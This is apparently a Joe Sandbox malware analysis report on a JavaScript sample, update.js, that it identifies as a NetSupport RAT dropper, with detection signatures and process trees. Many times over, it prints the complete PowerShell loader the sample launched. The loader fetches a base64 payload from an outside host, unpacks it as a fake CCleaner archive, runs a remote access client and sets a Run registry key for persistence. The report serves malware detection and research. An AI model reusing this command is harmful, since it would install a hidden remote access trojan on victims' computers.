Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
update.js

Overview

General Information

Sample name:update.js
Analysis ID:1490239
MD5:0d49cb3d2e8bfb9fce01adc2485da2b5
SHA1:ce08e5084103407eebec38525dbe36a8403b5465
SHA256:d43dbee4487ce35554643d0ceb620f179351a149f74373251e8efd1676604f6f
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
System process connects to network (likely due to code injection or exploit)
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Enables security privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w10x64_ra
  • wscript.exe (PID: 4992 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • client32.exe (PID: 6308 cmdline: "C:\Users\user\AppData\Roaming\RYMB15\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • svchost.exe (PID: 6260 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 1448 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\RYMB15\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\RYMB15\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\RYMB15\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\RYMB15\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 9 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            0000000D.00000000.1483378561.0000000000082000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              0000000B.00000002.1544728438.00000177485B4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                0000000B.00000002.1544728438.000001774858B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  0000000B.00000002.1544728438.00000177486DB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    0000000B.00000002.1544728438.00000177485AA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 7 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Base64 Encoded PowerShell Command Detected
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4992, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Pat
                      Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4992, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Pat
                      Sigma detected: Script Initiated Connection to Non-Local Network
                      Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 149.255.36.73, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4992, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49701
                      Sigma detected: Suspicious PowerShell Parameter Substring
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4992, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Pat
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ProcessId: 4992, ProcessName: wscript.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\RYMB15\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BCYLGMFSMV
                      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6412, TargetFilename: C:\Users\user\AppData\Roaming\RYMB15\client32.exe
                      Sigma detected: PowerShell Download Pattern
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4992, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Pat
                      Sigma detected: PowerShell Web Download
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4992, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Pat
                      Sigma detected: Script Initiated Connection
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 149.255.36.73, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4992, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49701
                      Sigma detected: Suspicious PowerShell Download - PoshModule
                      Source: Event LogsAuthor: Florian Roth (Nextron Systems): Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 844c58f6-60f8-4825-b253-e962a0e4a534 Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS; Engine Version = 5.1.19041.1682 Runspace ID = 2fed494c-97fa-4e56-aaca-f57af518af1b Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression.FileSystem", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 844c58f6-60f8-4825-b253-e962a0e4a534 Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -Prope
                      Sigma detected: Usage Of Web Request Commands And Cmdlets
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No 